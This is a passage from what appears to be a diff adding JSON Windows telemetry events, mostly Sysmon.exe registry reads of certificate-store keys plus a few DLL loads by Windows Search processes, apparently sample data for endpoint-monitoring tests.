"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", 
+ "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 
131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "tquery.dll", + "image_path": "C:\\Windows\\System32\\tquery.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": 
"C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570915900000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + 
"process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916680000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "cryptdll.dll", + "image_path": "C:\\Windows\\System32\\cryptdll.dll", + "pid": 6608, + "process_name": "SearchFilterHost.exe", + "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", + "timestamp": 131883570916369984, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" + }, + { + "event_type": "image_load", + "image_name": "cryptdll.dll", + "image_path": "C:\\Windows\\System32\\cryptdll.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570916060016, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ntmarta.dll", + "image_path": "C:\\Windows\\System32\\ntmarta.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916680000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916680000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 
